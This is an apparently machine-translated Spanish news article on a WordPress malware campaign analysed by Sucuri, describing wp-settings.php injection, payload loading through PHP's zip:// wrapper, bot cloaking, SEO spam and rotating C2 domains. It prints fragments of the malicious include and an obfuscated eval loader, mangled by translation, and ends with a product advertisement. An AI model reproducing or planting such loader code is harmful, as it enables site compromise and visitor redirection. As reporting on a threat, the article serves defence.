Los investigadores de ciberseguridad han descubierto una sofisticada campaña de malware que se dirige a sitios web de WordPress a través de un ingenioso mecanismo de ataque basado en el archivo de cierre.
El malware, reportado por primera vez en julio de 2025, representa una evolución significativa en las amenazas basadas en la web, utilizando técnicas de ofuscación avanzada y métodos de persistencia sigilosos para redirigir a los visitantes que no son a los dominios maliciosos mientras realizan simultáneamente operaciones de envenenamiento de optimización de motores de búsqueda.
El ataque comienza con el compromiso de los archivos centrales de WordPress, específicamente que se dirige al componente crítico WP-Settings.php.
Líneas de código altamente sospechosas (fuente – Sucuri)
Una vez que se obtiene el acceso, los atacantes inyectan un código malicioso que aprovecha la funcionalidad ZIP: // Wrapper para ejecutar cargas útiles ocultas.
Este enfoque permite que el malware permanezca prácticamente sin ser detectado por los escáneres de seguridad tradicionales, ya que el código malicioso se almacena dentro de lo que parece ser un archivo de archivo zip inocuo llamado Win.zip.
Los objetivos principales del malware se extienden más allá de los simples esquemas de redirección. Orquesta un ataque integral a las clasificaciones de motores de búsqueda a través de la inyección de contenido no autorizada, la manipulación del mapa del sitio y la creación de páginas cargadas de spam diseñadas para impulsar sitios web maliciosos en los resultados de búsqueda.
La infección demuestra una notable sofisticación en su capacidad para diferenciar entre visitantes humanos y bots automatizados, asegurando que los rastreadores de motores de búsqueda encuentren contenido benigno, mientras que los usuarios reales están sujetos a redireccionamientos maliciosos.
Analistas de Sucuri identificado El malware después de investigar problemas de redirección persistentes reportados por un cliente, lo que lleva al descubrimiento de esta amenaza de múltiples capas.
Los investigadores señalaron que el malware emplea la selección dinámica del servidor de comando y control, con diferentes dominios C2 activados en función de patrones de URL específicos accedidos por los visitantes.
Mecanismo de inclusión del archivo zip
La característica más innovadora del malware radica en su explotación de la zip de PHP: // Wrapper para la inclusión del código. La carga útil inicial, inyectada en wp-settings.php, contiene dos líneas críticas que establecen el marco de infección:-
$ h = str_replace (‘www.’, ”, $ _server (‘http_host’)); incluir (‘zip: //win.zip#’. $ h);
Este código extrae el nombre de dominio del encabezado http_host y lo usa para incluir un archivo directamente desde el archivo win.zip.
Mecanismo anti-bots y sigiloso (fuente-Sucuri)
La técnica omite los métodos tradicionales de detección basados en archivos, ya que el código malicioso reside dentro de un contenedor comprimido en lugar de como archivos PHP independientes.
Tras la extracción, el archivo zip revela un código PHP muy ofuscado estructurado como:-
$ encode = $ b3 ($ string); $ string1 = $ b2 ($ b4 ($ codede)); echo eval (“?>”. $ string1);
El malware establece la persistencia a través de la manipulación del entorno, estableciendo tiempos de espera de ejecución extendidos e implementando mecanismos de detección contra el bots.
Manipulación de archivos del sitio web (fuente – Sucuri)
Se selecciona dinámicamente de múltiples servidores de comando y control, incluidos dominios como wditemqy (.) Enturbioaj (.) Xyz y oqMetrix (.) Icercanokt (.) XYZ, dependiendo de la ruta de URL solicitada.
Esta arquitectura C2 distribuida mejora la resiliencia del malware contra los esfuerzos de eliminación al tiempo que permite la entrega de contenido dirigido en función de los patrones de comportamiento de los visitantes.
Investigue el comportamiento de malware en vivo, rastree cada paso de un ataque y tome decisiones de seguridad más rápidas y inteligentes -> Probar unnorteY.run ahora
